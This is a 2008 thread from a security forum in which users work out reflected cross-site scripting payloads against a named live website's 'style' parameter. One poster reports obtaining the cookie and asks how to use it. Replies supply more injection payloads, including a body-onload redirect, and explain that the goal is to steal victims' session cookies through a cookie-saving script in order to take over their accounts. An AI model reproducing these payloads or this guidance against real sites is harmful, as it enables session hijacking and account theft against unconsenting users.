|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 92
Members: 0
Total: 92
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XSS |
|
Posted: Thu Jun 19, 2008 4:31 pm |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Hi,
At this website : http://www.startimes2.com
I found this loophole :
Quote: | http://www.startimes2.com/f.aspx?style=lol">lol<lol lol=" |
But if I do :
Quote: | http://www.startimes2.com/f.aspx?style=lol"><script>alert(document.cookies);</script><lol lol=" |
I have a blank page :s |
|
|
|
|
Posted: Fri Jun 20, 2008 12:57 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Jun 20, 2008 9:25 am |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Quote: | http://www.startimes2.com/f.aspx?style=lol%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Clol%20lol=%22 |
Is blank too :s[/code] |
|
|
|
|
Posted: Fri Jun 20, 2008 9:33 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
mod_security anti-XSS measures maybe? |
|
|
|
|
Posted: Fri Jun 20, 2008 9:53 am |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Jun 20, 2008 10:01 am |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Quote: | http://www.startimes2.com/f.aspx?style=blue%22;t=document;alert(t.cookie);%22 |
I have the cookie, how to use it ? |
|
|
|
|
Posted: Fri Jun 20, 2008 10:07 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this tests:
Code: |
f.aspx?style=lol"><body onload="alert(123);"><lol lol=
f.aspx?style=lol"><body onload="document.location='http://www.yahoo.com'"><lol lol=
|
//Edit - corrected coding mistake // |
|
Last edited by waraxe on Sun Jun 22, 2008 1:08 am; edited 1 time in total |
|
|
|
Posted: Fri Jun 20, 2008 10:17 am |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jun 22, 2008 12:55 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
XSS is all about tricking people into following your link so you get their session cookie and can access their account. There must be tutorials out there but you basically need to redirect the user to your cookie saving script. |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|